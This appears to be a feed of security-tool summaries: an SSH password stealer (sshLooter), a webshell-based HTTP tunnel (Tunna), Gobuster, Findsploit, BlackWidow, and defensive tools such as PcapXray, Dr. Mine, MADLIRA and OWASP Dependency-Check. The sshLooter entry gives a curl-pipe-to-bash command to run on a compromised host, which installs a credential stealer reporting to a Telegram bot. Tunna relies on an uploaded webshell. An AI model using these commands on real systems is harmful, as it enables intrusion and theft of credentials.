  • Assistance with building basic persistence options and scripts
  • Armitage launcher
  • Drop into Msfconsole
  • Some other fun stuff :)

sshLooter - Script To Steal Passwords From SSH

$
0
0

Script to steal passwords from SSH.

Install
git clone https://github.com/mthbernardes/sshLooter.git
cd sshLooter

Configuration
Edit the script on install.sh, and add your telegram bot api, and your userid.
Call the @botfather on telegram to create a bot and call the @userinfobot to get your user id.

Usage
On your server execute.
python -m SimpleHTTPServer

On the hacked computer execute.
curl http://yourserverip:8000/install.sh | bash

Original script from
ChokePoint

Post about this script
Stealing SSH credentials Another Approach.


PcapXray - A Network Forensics Tool To visualize a Packet Capture offline as a Network Diagram

$
0
0
PcapXray is a Network Forensics Tool  To visualize a Packet Capture offline as a Network Diagram including device identification, highlight important communication and file extraction.

PcapXray Design Specification

Goal:
Given a Pcap File, plot a network diagram displaying hosts in the network, network traffic, highlight important traffic and Tor traffic as well as potential malicious traffic including data involved in the communication.

Problem:

Solution: Speed up the investigation process
  • Make a network diagram with the following features from a Pcap file Tool Highlights:
  • Network Diagram – Summary Network Diagram of full network
  • Information:
  • Traffic with Server Details
  • Tor Traffic
  • Possible Malicious traffic
  • Data Obtained from Packet in Report – Device/Traffic/Payloads
  • Device Details

Tool Image:



Components:
  • Network Diagram
  • Device/Traffic Details and Analysis
  • Malicious Traffic Identification
  • Tor Traffic
  • GUI – a gui with options to upload pcap file and display the network diagram

Python Libraries Used: - All these libraries are required for functionality
  • Tkinter and TTK – Install from pip or apt-get – Ensure Tkinter and graphviz is installed (Most Linux contain by default)
    • apt install python-tk
    • apt install graphviz
  • All these are included in the requirements.txt file
    • Scapy – rdpcap to read the packets from the pcap file
    • Ipwhois – to obtain whois information from ip
    • Netaddr – to check ip information type
    • Pillow – image processing library
    • Stem – tor consensus data fetch library
    • pyGraphviz – plot graph
    • Networkx – plot graph
    • Matplotlib – plot graph

Challenges:
  • Unstability of the TK GUI:
    • Decision on the GUI between Django and TK, settled upon tk for a simple local interface, but the unstability of the tk gui caused a number of problems
  • Graph Plotting:
    • Plotting a proper network graph which is readable from the data obtained was quite an effort, used different libraries to arrive at one.
  • Performance and Timing:
    • The performance and timing of the total application was a big challenge with different data gathering and output generation

Known Bugs:
  • Memory Hogging
    • Sometimes memory hogging occurs when lower RAM is present in the system as the data stored in the memory from the pcap file is huge
    • Should be Fixed by moving data into a database than the memory itself
  • Race Condition
    • Due to mainloop of the TK gui, other threads could undergo a race condition
    • Should be fixed by moving to a better structured TK implementation or Web GUI
  • Tk GUI Unstability:
    • Same reason as above
  • Current Fix in rare occasions: If any of the above issue occurs the progress bar keeps running and no output is generated, a restart of the app would be required.

Future:
  • Change the database from JSON to sqlite or prominent database, due to memory hogging
  • Change fronend to web based such as Django
  • Make the application more stable


Tunna - Set Of Tools Which Will Wrap And Tunnel Any TCP Communication Over HTTP

$
0
0

Tunna is a set of tools which will wrap and tunnel any TCP communication over HTTP. It can be used to bypass network restrictions in fully firewalled environments.

SUMMARY
TLDR: Tunnels TCP connections over HTTP
In a fully firewalled (inbound and outbound connections restricted - except the webserver port)
The webshell can be used to connect to any service on the remote host. This would be a local connection on a local port at the remote host and should be allowed by the firewall.
The webshell will read data from the service port wrap them over HTTP and send it as an HTTP response to the local proxy.
The local proxy will unwrap and write the data to it's local port where the client program would be connected.
When the local proxy receives data on the local port, it will send them over to the webshell as an HTTP Post.
The webshell will read the data from the HTTP Post and put them on the service port
and repeat --^
Only the webserver port needs to be open (typically 80/443) The whole communication (Externally) is done over the HTTP protocol

USAGE
python proxy.py -u <remoteurl> -l <localport> [options]

Options
--help, -h show this help message and exit
--url=URL, -u URL url of the remote webshell
--lport=LOCAL_PORT, -l LOCAL_PORT local listening port
--verbose, -v Verbose (outputs packet size)
--buffer=BUFFERSIZE, -b BUFFERSIZE* HTTP request size (some webshels have limitations on the size)

No SOCKS Options
Options are ignored if SOCKS proxy is used
--no-socks, -n Do not use Socks Proxy
--rport=REMOTE_PORT, -r REMOTE_PORT remote port of service for the webshell to connect to
--addr=REMOTE_IP, -a REMOTE_IP address for remote webshell to connect to (default = 127.0.0.1)

Upstream Proxy Options
Tunnel connection through a local Proxy
--up-proxy=UPPROXY, -x UPPROXY Upstream proxy (http://proxyserver.com:3128)
--auth, -A Upstream proxy requires authentication

Advanced Options
--ping-interval=PING_DELAY, -q PING_DELAY webshprx pinging thread interval (default = 0.5)
--start-ping, -s Start the pinging thread first - some services send data first (eg. SSH)
--cookie, -C Request cookies
--authentication, -t Basic authentication
  • See limitations
example usage: python proxy.py -u http://10.3.3.1/conn.aspx -l 8000 -v
# This will start a Local SOCKS Proxy Server at port 80000
# This connection will be wrapped over HTTP and unwrapped at the remote server

python proxy.py -u http://10.3.3.1/conn.aspx -l 8000 -x https://192.168.1.100:3128 -A -v

# This will start a Local SOCKS Proxy Server at port 80000
# It will connect through a Local Proxy (https://192.168.1.100:3128) that requires authentication
# to the remote Tunna webshell

python proxy.py -u http://10.3.3.1/conn.aspx -l 4444 -r 3389 -b 8192 -v --no-socks

# This will initiate a connection between the webshell and Remote host RDP (3389) service
# The RDP client can connect on localhost port 4444
# This connection will be wrapped over HTTP

Prerequisites
The ability to upload a webshell on the remote server

LIMITATIONS / KNOWN BUGS / HACKS
This is a POC code and might cause DoS of the server.
All efforts to clean up after execution or on error have been made (no promises)

Based on local tests:
* JSP buffer needs to be limited (buffer option):
4096 worked in Linux Apache Tomcat
1024 worked in XAMPP Apache Tomcat (slow)
* More than that created problems with bytes missing at the remote socket
eg: ruby proxy.rb -u http://10.3.3.1/conn.jsp -l 4444 -r 3389 -b 1024 -v

* Sockets not enabled by default php windows (IIS + PHP)

* Return cariages on webshells (outside the code):
get sent on responses / get written on local socket --> corrupt the packets

* PHP webshell for windows: the loop function DoS'es the remote socket:
sleep function added -> works but a bit slow
* PHP webshell needs new line characters removed at the end of the file (after "?>")
as these will get send in every response and confuse Tunna

FILES
Webshells:
conn.jsp Tested on Apache Tomcat (windows + linux)
conn.aspx Tested on IIS 6+8 (windows server 2003/2012)
conn.php Tested on LAMP + XAMPP + IIS (windows + linux)

WebServer:
webserver.py Tested with Python 2.6.5

Proxies:
proxy.py Tested with Python 2.6.5

Technical Details

Architecture descisions
Data is sent raw in the HTTP Post Body (no post variable)

Instructions / configuration is sent to the webshell as URL parameters (HTTP Get)
Data is sent in the HTTP body (HTTP Post)

Websockets not used: Not supported by default by most of webservers
Asyncronous HTTP responses not really possible
Proxy queries the server constantly (default 0.5 seconds)

INITIATION PHASE
1st packet initiates a session with the webshell - gets a cookie back eg: http://webserver/conn.ext?proxy
2nd packet sends connection configuration options to the webshell eg: http://webserver/conn.ext?proxy&port=4444&ip=127.0.0.1
IP and port for the webshell to connect to
This is a threaded request:
In php this request will go into an infinate loop
to keep the webshell socket connection alive
In other webshells [OK] is received back

TUNNA CLIENT
A local socket is going to get created where the client program is going to connect to Once the client is connected the pinging thread is initiated and execution starts. Any data on the socket (from the client) get read and get sent as a HTTP Post request Any data on the webshell socket get sent as a response to the POST request

PINGING THREAD
Because HTTP responses cannot be asyncronous. This thread will do HTTP Get requests on the webshell based on an interval (default 0.5 sec) If the webshell has data to send, it will (also) send it as a reply to this request Otherwise it sends an empty response
In general: Data from the local proxy get send with HTTP Post There are Get requests every 0.5 sec to query the webshell for data If there is data on the webshell side get send over as a response to one of these requests

WEBSHELL
The webshell connects to a socket on the local or a remote host. Any data written on the socket get sent back to the proxy as a reply to a request (POST/GET) Any data received with a post get written to the socket.

NOTES
All requests need to have the URL parameter "proxy" set to be handled by the webshell (http://webserver/conn.ext?proxy)

AT EXIT / AT ERROR
Kills all threads and closes local socket Sends proxy&close to webshell: Kills remote threads and closes socket

SOCKS
The SOCKS support is an addon module for Tunna. Locally is a seperate thread that handles the connection requests and traffic adds a header that specifies the port and the size of the packet and forwards it to Tunna. Tunna sends it over to the remote webserver, removes the HTTP headers and forwards the packet to the remote SOCKS proxy. The remote SOCKS proxy initiates the connection and mapps the received port to the local port. If the remote SOCKS proxy receives data from the service, it looks at the mapping table and finds the port it needs to respond to, adds the port as a header so the local SOCKS proxy will know where to forward the data. Any traffic from the received port will be forwarded to the local port and vice versa.


Gobuster - Directory/File & DNS Busting Tool Written In Go

$
0
0

Gobuster is a tool used to brute-force:
  • URIs (directories and files) in web sites.
  • DNS subdomains (with wildcard support).

Oh dear God.. WHY!?
Because I wanted:
  1. ... something that didn't have a fat Java GUI (console FTW).
  2. ... to build something that just worked on the command line.
  3. ... something that did not do recursive brute force.
  4. ... something that allowed me to brute force folders and multiple extensions at once.
  5. ... something that compiled to native on multiple platforms.
  6. ... something that was faster than an interpreted script (such as Python).
  7. ... something that didn't require a runtime.
  8. ... use something that was good with concurrency (hence Go).
  9. ... to build something in Go that wasn't totally useless.

Common Command line options
  • -fw - Force processing of a domain with wildcard results.
  • -m <mode> - which mode to use, either dir or dns (default: dir)
  • -q - disables banner/underline output.
  • -t <threads> - number of threads to run (default: 10).
  • -u <url/domain> - full URL (including scheme), or base domain name.
  • -v - verbose output (show all results).
  • -w <wordlist> - path to the wordlist used for brute forcing.

Command line options for dns mode
  • -cn - show CNAME records (cannot be used with '-i' option).
  • -i - show all IP addresses for the result.

Command line options for dir mode
  • -a <user agent string> - specify a user agent string to send in the request header.
  • -c <http cookies> - use this to specify any cookies that you might need (simulating auth).
  • -e - specify extended mode that renders the full URL.
  • -f - append / for directory brute forces.
  • -k - Skip verification of SSL certificates.
  • -l - show the length of the response.
  • -n - "no status" mode, disables the output of the result's status code.
  • -o <file> - specify a file name to write the output to.
  • -p <proxy url> - specify a proxy to use for all requests (scheme much match the URL scheme).
  • -r - follow redirects.
  • -s <status codes> - comma-separated set of the list of status codes to be deemed a "positive" (default: 200,204,301,302,307).
  • -x <extensions> - list of extensions to check for, if any.
  • -P <password> - HTTP Authorization password (Basic Auth only, prompted if missing).
  • -U <username> - HTTP Authorization username (Basic Auth only).

Building
Since this tool is written in Go you need install the Go language/compiler/etc. Full details of installation and set up can be found on the Go language website. Once installed you have two options.

Compiling
gobuster now has external dependencies, and so they need to be pulled in first:
gobuster $ go get && go build
This will create a gobuster binary for you. If you want to install it in the $GOPATH/bin folder you can run:
gobuster $ go install

Running as a script
gobuster$ go run main.go <parameters>

Wordlists via STDIN
Wordlists can be piped into gobuster via stdin:
hashcat -a 3 --stdout ?l | gobuster -u https://mysite.com
Note: If the -w option is specified at the same time as piping from STDIN, an error will be shown and the program will terminate.

Examples

dir mode
Command line might look like this:
$ gobuster -u https://mysite.com/path/to/folder -c 'session=123456' -t 50 -w common-files.txt -x .php,.html
Default options looks like this:
$ gobuster -u http://buffered.io/ -w words.txt

Gobuster v1.4.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://buffered.io/
[+] Threads : 10
[+] Wordlist : words.txt
[+] Status codes : 200,204,301,302,307
=====================================================
/index (Status: 200)
/posts (Status: 301)
/contact (Status: 301)
=====================================================
Default options with status codes disabled looks like this:
$ gobuster -u http://buffered.io/ -w words.txt -n

Gobuster v1.4.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://buffered.io/
[+] Threads : 10
[+] Wordlist : words.txt
[+] Status codes : 200,204,301,302,307
[+] No status : true
=====================================================
/index
/posts
/contact
=====================================================
Verbose output looks like this:
$ gobuster -u http://buffered.io/ -w words.txt -v

Gobuster v1.4.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://buffered.io/
[+] Threads : 10
[+] Wordlist : words.txt
[+] Status codes : 200,204,301,302,307
[+] Verbose : true
=====================================================
Found : /index (Status: 200)
Missed: /derp (Status: 404)
Found : /posts (Status: 301)
Found : /contact (Status: 301)
=====================================================
Example showing content length:
$ gobuster -u http://buffered.io/ -w words.txt -l

Gobuster v1.4.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://buffered.io/
[+] Threads : 10
[+] Wordlist : /tmp/words
[+] Status codes : 301,302,307,200,204
[+] Show length : true
=====================================================
/contact (Status: 301)
/posts (Status: 301)
/index (Status: 200) [Size: 61481]
=====================================================
Quiet output, with status disabled and expanded mode looks like this ("grep mode"):
$ gobuster -u http://buffered.io/ -w words.txt -q -n -e
http://buffered.io/posts
http://buffered.io/contact
http://buffered.io/index

dns mode
Command line might look like this:
$ gobuster -m dns -u mysite.com -t 50 -w common-names.txt
Normal sample run goes like this:
$ gobuster -m dns -w subdomains.txt -u google.com

Gobuster v1.4.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dns
[+] Url/Domain : google.com
[+] Threads : 10
[+] Wordlist : subdomains.txt
=====================================================
Found: m.google.com
Found: admin.google.com
Found: mobile.google.com
Found: www.google.com
Found: search.google.com
Found: chrome.google.com
Found: ns1.google.com
Found: store.google.com
Found: wap.google.com
Found: support.google.com
Found: directory.google.com
Found: translate.google.com
Found: news.google.com
Found: music.google.com
Found: mail.google.com
Found: blog.google.com
Found: cse.google.com
Found: local.google.com
=====================================================
Show IP sample run goes like this:
$ gobuster -m dns -w subdomains.txt -u google.com -i

Gobuster v1.4.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dns
[+] Url/Domain : google.com
[+] Threads : 10
[+] Wordlist : subdomains.txt
[+] Verbose : true
=====================================================
Found: chrome.google.com [2404:6800:4006:801::200e, 216.58.220.110]
Found: m.google.com [216.58.220.107, 2404:6800:4006:801::200b]
Found: www.google.com [74.125.237.179, 74.125.237.177, 74.125.237.178, 74.125.237.180, 74.125.237.176, 2404:6800:4006:801::2004]
Found: search.google.com [2404:6800:4006:801::200e, 216.58.220.110]
Found: admin.google.com [216.58.220.110, 2404:6800:4006:801::200e]
Found: store.google.com [216.58.220.110, 2404:6800:4006:801::200e]
Found: mobile.google.com [216.58.220.107, 2404:6800:4006:801::200b]
Found: ns1.google.com [216.239.32.10]
Found: directory.google.com [216.58.220.110, 2404:6800:4006:801::200e]
Found: translate.google.com [216.58.220.110, 2404:6800:4006:801::200e]
Found: cse.google.com [216.58.220.110, 2404:6800:4006:801::200e]
Found: local.google.com [2404:6800:4006:801::200e, 216.58.220.110]
Found: music.google.com [2404:6800:4006:801::200e, 216.58.220.110]
Found: wap.google.com [216.58.220.110, 2404:6800:4006:801::200e]
Found: blog.google.com [216.58.220.105, 2404:6800:4006:801::2009]
Found: support.google.com [216.58.220.110, 2404:6800:4006:801::200e]
Found: news.google.com [216.58.220.110, 2404:6800:4006:801::200e]
Found: mail.google.com [216.58.220.101, 2404:6800:4006:801::2005]
=====================================================
Base domain validation warning when the base domain fails to resolve. This is a warning rather than a failure in case the user fat-fingers while typing the domain.
$ gobuster -m dns -w subdomains.txt -u yp.to -i

Gobuster v1.4.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dns
[+] Url/Domain : yp.to
[+] Threads : 10
[+] Wordlist : /tmp/test.txt
=====================================================
[-] Unable to validate base domain: yp.to
Found: cr.yp.to [131.155.70.11, 131.155.70.13]
=====================================================
Wildcard DNS is also detected properly:
$ gobuster -w subdomainsbig.txt -u doesntexist.com -m dns

Gobuster v1.4.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dns
[+] Url/Domain : doesntexist.com
[+] Threads : 10
[+] Wordlist : subdomainsbig.txt
=====================================================
[-] Wildcard DNS found. IP address(es): 123.123.123.123
[-] To force processing of Wildcard DNS, specify the '-fw' switch.
=====================================================
If the user wants to force processing of a domain that has wildcard entries, use -fw:
$ gobuster -w subdomainsbig.txt -u doesntexist.com -m dns -fw

Gobuster v1.4.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dns
[+] Url/Domain : doesntexist.com
[+] Threads : 10
[+] Wordlist : subdomainsbig.txt
=====================================================
[-] Wildcard DNS found. IP address(es): 123.123.123.123
Found: email.doesntexist.com
^C[!] Keyboard interrupt detected, terminating.
=====================================================


Dr. Mine - Tool To Aid Automatic Detection Of In-Browser Cryptojacking

$
0
0

Dr. Mine is a node script written to aid automatic detection of in-browser cryptojacking. The most accurate way to detect things that happen in a browser is via browser itself. Thus, Dr. Mine uses puppeteer to automate browser thingy and catches any requests to online cryptominers. When a request to any online cryptominers is detected, it flags the corresponding URL and cryptominer being in use. Therefore, however the code is written or obfuscated, Dr. Mine will catch it (as long as the miners are in the list). The list of online cryptominers are fetched from CoinBlockerLists. The result is also saved on file for later use.
  • Can also process single URL passed directly via command line
  • All links found on the first (requested) page are also processed, if same-origin
  • All configurable options are stored in config.js allowing easier modifications
  • To reduce extra bandwidth and processing, all requests to resources like fonts, images, media, stylesheets are aborted

Pre-requisites & Installation
The following 3 lines of commands should set everything up and running on Arch distros;
pacman -S nodejs npm
git clone https://github.com/1lastBr3ath/drmine.git && cd drmine
npm i --save puppeteer
Please make sure your version of node is 7.6.0 or greater. For any installation assistance or instructions on specific distros, please refer to respective documents;
https://nodejs.org/en/download/package-manager/
https://docs.npmjs.com/getting-started/installing-node
https://github.com/GoogleChrome/puppeteer#installation

Usage
Dr. Mine accepts either a URL or a file which is expected to contain valid URLs. Usage is as simple as;
node drmine.js list.txt
A sample list.txt looks like;
http://cm2.pw
http://cm2.pw/xmr/
https://example.com/
An example of passing URL directly via command line;
node drmine.js http://cm2.pw/xmr/



DVHMA - Damn Vulnerable Hybrid Mobile App (For Android) That Intentionally Contains Vulnerabilities

$
0
0

Damn Vulnerable Hybrid Mobile App (DVHMA) is an hybrid mobile app (for Android) that intentionally contains vulnerabilities. Its purpose is to enable security professionals to test their tools and techniques legally, help developers better understand the common pitfalls in developing hybrid mobile apps securely.

Motivation and Scope
This app is developed to study pitfalls in developing hybrid apps, e.g., using Apache Cordova or SAP Kapsel, securely. Currently, the main focus is to develop a deeper understanding of injection vulnerabilities that exploit the JavaScript to Java bridge.

Installation

Prerequisites
We assume that the
Moreover, we assume a basic familiarity with the build system of Apache Cordova.

Building DVHMA

Setting Environment Variables
export ANDROID_HOME=<Android SDK Installation Directory>
export PATH=$ANDROID_HOME/tools:$PATH
export PATH=$ANDROID_HOME/platform-tools:$PATH

Compiling DVHMA
cd DVHMA-Featherweight
cordova plugin add ../plugins/DVHMA-Storage
cordova plugin add ../plugins/DVHMA-WebIntent
cordova platform add android
cordova compile android

Running DVHMA in an Emulator
cordova run android 

Team Members
The development of this application started as part of the project ZertApps. ZertApps was a collaborative research project funded by the German Ministry for Research and Education. It is now developed and maintained by the Software Assurance & Security Research Team at The University of Sheffield, UK.

The core developers of DVHMA are:

Publications


MADLIRA - Malware detection using learning and information retrieval for Android

$
0
0
MADLIRA is a tool for Androidmalware detection. It consists in two components: TFIDF component and SVM learning component. In gerneral, it takes an input a set of malwares and benwares and then extracts the malicious behaviors (TFIDF component) or computes training model (SVM classifier). Then, it uses this knowledge to detect malicious behaviors in the Android application.

Insalling
Download file MADLIRA.7z and decompress it.

Installed Data:
  • MADLIRA.jar is the main application.
  • noAPI.txt declares the prefix of APIs.
  • family.txt lists malwares by family.
  • Folder TrainData contains the training configuration and training model.
  • Folder Samples contains sample data.
  • Folder TempData contains data for kernel computation.

Functionality
This tool have two main components: TFIDF component and SVM component.

TFIDF component
Command: MADLIRA TFIDF
For this component, there are two functions: the training function (Malicious behavior extraction) and the test function (Malicious behavior detection)

Malicious behavior extraction
  • Collect benign applications and malicious applications and oput them in folders named benginAPKFolder and maliciousApkFolder, respectively.
  • Prepare training data and pack them in two files named benignPack and maliciousPack by using the command:
MADLIRA TFIDF packAPK -PB benignApkFolder -B benignPack -PM maliciousApkFolder -M maliciousPack
  • Extracting malicious behaviors from two packed files (benignPack and maliciousPack) by using the command:
MADLIRA TFIDF train -B benignPack -M maliciousPack

Malicious behavior detection
  • Collect new applications and put them in a folder named checkApk.
  • Detect malicious behaviors of applications in the folder checkApk by using the command:
MADLIRA TFIDF check -S checkApk
Command:
MADLIRA TFIDF train <Options>
Compute the malicious specifications for given training data.
-B <filename>: the archive file contains all graphs of training benwares.
-M <filename>: the archive file contains all categories of training malwares.

MADLIRA TFIDF check <Options>
Check malicious behaviors in the given applications in a folder.
-S <folder>: the folder contains all applications (apk files).

MADLIRA TFIDF test <Options>
Test the classifier for a given test data.
-S <folder>: the folder contains all graphs for testing.

MADLIRA TFIDF clear
Clean all training data.

MADLIRA TFIDF install
Clean old training data and install a new data for training.
-B <filename>: the archive file contains all graphs of training benwares.
-M <filename>: the archive file contains all categories of training malwares.

Examples:
Training new data:
  • First collect training applications (APK files) and store them in folders named MalApkFolder and BenApkFolder.
  • Pack training applications into archive files named MalPack and BenPack by using this command:
MADLIRA TFIDF packAPK -PB BenApkFolder -B BenPack -PM MalApkFolder -M MalPack
  • Clean old training data:
MADLIRA TFIDF clear
  • Compute the malicious graphs from the training packs (BenPack and MalPack)
MADLIRA TFIDF train -B BenPack -M MalPack
Checking new applications:
  • put these applications in a folder named checkApk and use this command:
MADLIRA TFIDF check -S checkApk
Output:


SVM component
Command: MADLIRA SVM
For this component, there are two functions: the training function and the test function.

Training phase
  • Collect benign applications in a folder named benignApkFolder and malicious applications in a folder named maliciousApkFolder.
  • Prepare training data by using the commands:
MADLIRA SVM packAPK -PB benignApkFolder -B benignPack -PM maliciousApkFolder -M maliciousPack
  • Compute the training model by this command:
MADLIRA SVM train -B benignPack -M maliciousPack

Malicious behavior detection
  • Collect new applications and put them in a folder named checkApk
  • Detect malicious behaviors of applications in the folder checkApk by using the command:
MADLIRA SVM check -S checkApk
Command:
MADLIRA SVM train <Options>
Compute the classifier for given training data.
-T <T>: max length of the common walks (default value = 3).
-l <lambda>: lambda value to control the importance of length of walks (default value = 0.4).
-B <filename>: the archive file contains all graphs of training benwares.
-M <filename>: the archive file contains all graphs of training malwares.

MADLIRA SVM check <Options>
Check malicious behaviors in the applications in a folder.
-S <foldername>: the folder contains all apk files.

MADLIRA SVM test <Options>
Test the classifier for given graph data.
-S <foldername>: the folder contains all graphs of test data.
-n <n>: the number of test samples.

MADLIRA SVM clear
Clean all training data.

Packages:
This tool uses the following packages:

References
  • Khanh Huu The Dam and Tayssir Touili. Extracting Android Malicious Behaviors. In Proceedings of ForSE 2017
  • Khanh Huu The Dam and Tayssir Touili. Learn Android malware. In Proceedings of IWSMA@ARES 2017


Findsploit - Find Exploits In Local And Online Databases Instantly

$
0
0

Finsploit is a simple bash script to quickly and easily search both local and online exploit databases. This repository also includes "copysploit" to copy any exploit-db exploit to the current directory and "compilesploit" to automatically compile and run any C exploit (ie. ./copysploit 1337.c && ./compilesploit 1337.c).
For updates to this script, type findsploit update

INSTALLATION
./install.sh

USAGE
Search for all exploits and modules using a single search term:
* findsploit <search_term_1> (ie. findsploit apache)

Search multiple search terms:
* findsploit <search_term_1> <search_term_2> <search_term_3> ...

Show all NMap scripts:
* findsploit nmap

Search for all FTP NMap scripts:
* findsploit nmap | grep ftp

Show all Metasploit auxiliary modules:
* findsploit auxiliary

Show all Metasploit exploits:
* findsploit exploits

Show all Metasploit encoder modules:
* findsploit encoder

Show all Metasploit payloads modules:
* findsploit payloads

Search all Metasploit payloads for windows only payloads:
* findsploit payloads | grep windows


BlackWidow - A Python Based Web Application Scanner To Gather OSINT And Fuzz For OWASP Vulnerabilities On A Target Website

$
0
0

BlackWidow is a python based web application spider to gather subdomains, URL's, dynamic parameters, email addresses and phone numbers from a target website. This project also includes Inject-X fuzzer to scan dynamic URL's for common OWASP vulnerabilities.

DEMO VIDEO:


FEATURES:
  • Automatically collect all URL's from a target website
  • Automatically collect all dynamic URL's and parameters from a target website
  • Automatically collect all subdomains from a target website
  • Automatically collect all phone numbers from a target website
  • Automatically collect all email addresses from a target website
  • Automatically collect all form URL's from a target website
  • Automatically scan/fuzz for common OWASP TOP vulnerabilities
  • Automatically saves all data into sorted text files

LINUX INSTALL:
cp blackwidow /usr/bin/blackwidow 
cp injectx.py /usr/bin/injectx.py
pip install -r requirements.txt

USAGE:
blackwidow -u https://target.com - crawl target.com with 3 levels of depth.
blackwidow -d target.com -l 5 - crawl the domain: target.com with 5 levels of depth.
blackwidow -d target.com -l 5 -c 'test=test' - crawl the domain: target.com with 5 levels of depth using the cookie 'test=test'
blackwidow -d target.com -l 5 -s y - crawl the domain: target.com with 5 levels of depth and fuzz all unique parameters for OWASP vulnerabilities.
injectx.py https://test.com/uers.php?user=1&admin=true - Fuzz all GET parameters for common OWASP vulnerabilities.

DOCKER:
git clone https://github.com/1N3/BlackWidow.git
cd BlackWidow
docker build -t BlackWidow .
docker run -it BlackWidow # Defaults to --help

OWASP DependencyCheck - A Software Composition Analysis Utility That Detects Publicly Disclosed Vulnerabilities In Application Dependencies

$
0
0

Dependency-Check is a utility that attempts to detect publicly disclosed vulnerabilities contained within project dependencies. It does this by determining if there is a Common Platform Enumeration (CPE) identifier for a given dependency. If found, it will generate a report linking to the associated CVE entries.
Documentation and links to production binary releases can be found on the github pages. Additionally, more information about the architecture and ways to extend dependency-check can be found on the wiki.

Current Releases

Jenkins Plugin
For instructions on the use of the Jenkins plugin please see the OWASP Dependency-Check Plugin page.

Command Line
More detailed instructions can be found on the dependency-check github pages. The latest CLI can be downloaded from bintray's dependency-check page.
On *nix
$ ./bin/dependency-check.sh -h
$ ./bin/dependency-check.sh --project Testing --out . --scan [path to jar files to be scanned]
On Windows
> .\bin\dependency-check.bat -h
> .\bin\dependency-check.bat --project Testing --out . --scan [path to jar files to be scanned]
On Mac with Homebrew
$ brew update && brew install dependency-check
$ dependency-check -h
$ dependency-check --project Testing --out . --scan [path to jar files to be scanned]

Maven Plugin
More detailed instructions can be found on the dependency-check-maven github pages. By default, the plugin is tied to the verify phase (i.e. mvn verify). Alternatively, one can directly invoke the plugin via mvn org.owasp:dependency-check-maven:check.
The dependency-check plugin can be configured using the following:
<project>
<build>
<plugins>
...
<plugin>
<groupId>org.owasp</groupId>
<artifactId>dependency-check-maven</artifactId>
<executions>
<execution>
<goals>
<goal>check</goal>
</goals>
</execution>
</executions>
</plugin>
...
</plugins>
...
</build>
...
</project>

Ant Task
For instructions on the use of the Ant Task, please see the dependency-check-ant github page.

Development Usage
The following instructions outline how to compile and use the current snapshot. While every intention is to maintain a stable snapshot it is recommended that the release versions listed above be used.
The repository has some large files due to test resources. The team has tried to cleanup the history as much as possible. However, it is recommended that you perform a shallow clone to save yourself time:
git clone --depth 1 git@github.com:jeremylong/DependencyCheck.git
On *nix
$ mvn install
$ ./dependency-check-cli/target/release/bin/dependency-check.sh -h
$ ./dependency-check-cli/target/release/bin/dependency-check.sh --project Testing --out . --scan ./src/test/resources
On Windows
> mvn install
> .\dependency-check-cli\target\release\bin\dependency-check.bat -h
> .\dependency-check-cli\target\release\bin\dependency-check.bat --project Testing --out . --scan ./src/test/resources
Then load the resulting 'dependency-check-report.html' into your favorite browser.

Docker
In the following example it is assumed that the source to be checked is in the current working directory. Persistent data and report directories are used, allowing you to destroy the container after running.
#!/bin/sh

OWASPDC_DIRECTORY=$HOME/OWASP-Dependency-Check
DATA_DIRECTORY="$OWASPDC_DIRECTORY/data"
REPORT_DIRECTORY="$OWASPDC_DIRECTORY/reports"

if [ ! -d "$DATA_DIRECTORY" ]; then
echo "Initially creating persistent directories"
mkdir -p "$DATA_DIRECTORY"
chmod -R 777 "$DATA_DIRECTORY"

mkdir -p "$REPORT_DIRECTORY"
chmod -R 777 "$REPORT_DIRECTORY"
fi

# Make sure we are using the latest version
docker pull owasp/dependency-check

docker run --rm \
--volume $(pwd):/src \
--volume "$DATA_DIRECTORY":/usr/share/dependency-check/data \
--volume "$REPORT_DIRECTORY":/report \
owasp/dependency-check \
--scan /src \
--format "ALL" \
--project "My OWASP Dependency Check Project"
# Use suppression like this: (/src == $pwd)
# --suppression "/src/security/dependency-check-suppression.xml"

Upgrade Notes

Upgrading from 1.x.x to 2.x.x
Note that when upgrading from version 1.x.x that the following changes will need to be made to your configuration.

Suppression file
In order to support multiple suppression files, the mechanism for configuring suppression files has changed. As such, users that have defined a suppression file in their configuration will need to update.
See the examples below:

Ant
Old:
<dependency-check
failBuildOnCVSS="3"
suppressionFile="suppression.xml">
</dependency-check>
New:
<dependency-check
failBuildOnCVSS="3">
<suppressionFile path="suppression.xml" />
</dependency-check>

Maven
Old:
<plugin>
<groupId>org.owasp</groupId>
<artifactId>dependency-check-maven</artifactId>
<configuration>
<suppressionFile>suppression.xml</suppressionFile>
</configuration>
</plugin>
New:
<plugin>
<groupId>org.owasp</groupId>
<artifactId>dependency-check-maven</artifactId>
<configuration>
<suppressionFiles>
<suppressionFile>suppression.xml</suppressionFile>
</suppressionFiles>
</configuration>
</plugin>

Gradle
In addition to the changes to the suppression file, the task dependencyCheck has been renamed to dependencyCheckAnalyze.
Old:
buildscript {
repositories {
mavenLocal()
}
dependencies {
classpath 'org.owasp:dependency-check-gradle:2.0.1-SNAPSHOT'
}
}
apply plugin: 'org.owasp.dependencycheck'

dependencyCheck {
suppressionFile='path/to/suppression.xml'
}
check.dependsOn dependencyCheckAnalyze
New:
buildscript {
repositories {
mavenLocal()
}
dependencies {
classpath 'org.owasp:dependency-check-gradle:2.0.1-SNAPSHOT'
}
}
apply plugin: 'org.owasp.dependencycheck'

dependencyCheck {
suppressionFiles = ['path/to/suppression1.xml', 'path/to/suppression2.xml']
}
check.dependsOn dependencyCheckAnalyze


Viewing all 5854 articles
Browse latest View live


<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>